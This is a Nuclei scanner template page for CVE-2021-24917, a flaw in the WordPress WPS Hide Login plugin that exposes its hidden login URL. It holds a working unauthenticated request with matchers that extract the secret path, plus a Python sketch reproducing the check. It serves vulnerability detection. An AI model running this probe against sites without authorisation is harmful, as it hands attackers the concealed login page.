WordPress WPS Hide Login <1.9.1 - Information Disclosure
ID: CVE-2021-24917
Severity: high
Author: akincibor
Tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur
Description
WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.
YAML Source
id: CVE-2021-24917

info:
  name: WordPress WPS Hide Login <1.9.1 - Information Disclosure
  author: akincibor
  severity: high
  description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.
  impact: |
    An attacker can gain sensitive information about the WordPress site, such as the login page URL.
  remediation: Fixed in version 1.9.1.
  reference:
    - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24917
    - https://wordpress.org/support/topic/bypass-security-issue/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-24917
    cwe-id: CWE-863
    epss-score: 0.04098
    epss-percentile: 0.92139
    cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpserveur
    product: wps_hide_login
    framework: wordpress
  tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur

http:
  - raw:
      - |
        GET /wp-admin/options.php HTTP/1.1
        Host: {{Hostname}}
        Referer: something

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "!contains(tolower(location), 'wp-login.php')"

      - type: word
        part: header
        words:
          - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'

    extractors:
      - type: kval
        kval:
          - location
# digest: 4b0a00483046022100cbc033492f913158f00fe6bbd4dcb893b666aa732b4322b59a9533c29ede6323022100e87109f50d4966265f74d0cf4d266c1ef7983e5ddb676a7a344e29984368d733:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
Run this template with the Nuclei tool to check whether a site discloses its hidden login location in the redirect returned for /wp-admin/options.php.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24917.yaml"
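The template's two matchers and its extractor can be read as a single decision over the response headers. The following is an added example, not part of the template or of Nuclei: a Python sketch of that decision for checking a response captured from your own site before and after upgrading to 1.9.1. The function name, the sample headers, the host blog.example and the slug are all constructed for illustration.

```python
from urllib.parse import urlsplit

# String the template's word matcher looks for in the response headers.
REDIRECT_MARKER = "redirect_to=%2Fwp-admin%2Fsomething&reauth=1"

# Constructed sample response headers (host and slug are made up).
SAMPLE_DISCLOSING = {
    "Location": "https://blog.example/my-secret-login/"
                "?redirect_to=%2Fwp-admin%2Fsomething&reauth=1",
}
SAMPLE_DEFAULT_LOGIN = {
    "location": "https://blog.example/WP-Login.php"
                "?redirect_to=%2Fwp-admin%2Fsomething&reauth=1",
}
SAMPLE_NO_MARKER = {"Location": "https://blog.example/"}


def evaluate_headers(headers):
    """Apply both matchers (condition: and) to one response's headers.

    Returns (disclosed, login_path). login_path is the path component of
    the Location header, i.e. what the kval extractor would surface.
    """
    # Header names are case-insensitive, so normalise them before lookup.
    lowered = {name.lower(): value for name, value in headers.items()}
    location = lowered.get("location", "")
    if not location:
        return False, None

    # dsl matcher: Location must NOT point at the default wp-login.php.
    not_default_login = "wp-login.php" not in location.lower()

    # word matcher (part: header): marker must appear somewhere in the headers.
    raw_headers = "\n".join(f"{k}: {v}" for k, v in headers.items())
    has_marker = REDIRECT_MARKER in raw_headers

    if not_default_login and has_marker:
        return True, urlsplit(location).path
    return False, None


if __name__ == "__main__":
    for name, sample in [("disclosing", SAMPLE_DISCLOSING),
                         ("default login", SAMPLE_DEFAULT_LOGIN),
                         ("no marker", SAMPLE_NO_MARKER)]:
        print(name, evaluate_headers(sample))
```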